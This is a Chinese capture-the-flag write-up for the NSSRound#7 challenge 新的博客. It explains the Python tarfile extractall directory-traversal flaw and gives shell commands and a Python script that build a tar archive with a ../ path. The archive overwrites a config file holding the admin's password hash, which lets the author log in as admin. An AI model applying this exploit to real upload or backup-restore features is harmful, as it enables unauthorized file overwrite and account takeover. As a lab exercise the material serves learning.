文章目录
- 前言
- 原理
- 例题 [NSSRound#7 Team]新的博客
- 方法一 手搓文件名
- 方法二 python脚本
前言
做到[NSSRound#6 Team]check(Revenge)
时发现是tar文件覆盖,但是对概念和执行过程理解不够深就光光记住脚本,所以在做本题[NSSRound#7 Team]新的博客
时打算重新梳理该漏洞执行过程
原理
Python 中 tarfile 模块中的extract、extractFile和extractall 函数中的目录遍历漏洞 允许 用户协助的远程攻击者通过 TAR 存档文件名中的…和/遍历目录 和 写入/覆盖任意文件
关键代码
tar = tarfile.open(file_save_path, "r")
tar.extractall(app.config['UPLOAD_FOLDER'])
extractall函数如果结合包含…/的文件名时可以实现文件覆盖漏洞
例题 [NSSRound#7 Team]新的博客
打开题目,发现有两个跳转的网页
第一个提示要用admin用户登录但是密码经过sha512加密,然后就是泄露了源码地址
第二个网页提示hacker打不开,那么应该是要admin才行
我们把字符串解码一下
得到源码文件夹,文件结构大概如下
当然此文件夹给了加密后的密码,但是也提示我们不用去爆破
这里我们先随便注册用户1试试,发现存在tar文件上传
提示也说了这个是恢复备份用的,那么思路就是tar文件覆盖
方法一 手搓文件名
我们已知userinfo.json存放着用户和加密的密码,那么我们可以尝试自己加密123456去覆盖admin原本的密码从而实现登录。加密脚本如下
import hashlib
import json
password='123456'
with open('userinfo.json','wb') as file:
file.write(json.dumps({'admin':hashlib.sha512(password.encode('utf-8')).hexdigest()}).encode('utf-8'))
我们覆盖的路径为/app/conf/userinfo.json
,但是我们发现要目录穿越
因为我们以用户1登录后,参考前文给的文件结构可知道需要被覆盖路径为1/../../app/conf/userinfo.json
,也就是说我们创建的文件名为1/../../app/conf/userinfo.json
。在linux下构建文件夹结构,然后将上述脚本生成的userinfo.json进行tar压缩
tar -czvf upload.tar.gz userinfo.json
然后我们在userData文件夹下,执行tar命令构造出覆盖路径的文件名
tar cPzvf upload.tar.gz 1/../../conf/userinfo.json
方法二 python脚本
import os, hashlib, json
username = '1' # 你注册时用的用户名,尽量别有奇怪的符号
admin_passwd = '123456' # 之后要使用admin账户登陆时的密码
os.makedirs('conf')
os.makedirs(os.sep.join([os.getcwd(), 'userData', username]))
with open(os.sep.join([os.getcwd(), 'conf', 'userinfo.json']), 'wb') as tFile:
tFile.write(json.dumps({'admin': hashlib.sha512(admin_passwd.encode('utf-8')).hexdigest()}).encode('utf-8'))
userDataDir = os.sep.join([os.getcwd(), 'userData'])
os.system(f'cd "{userDataDir}" && tar cPzvf upload.tar.gz {username}/../../conf/userinfo.json')
然后我们登录用户1,上传生成的tar文件
然后退出,用密码123456登录即可得到flag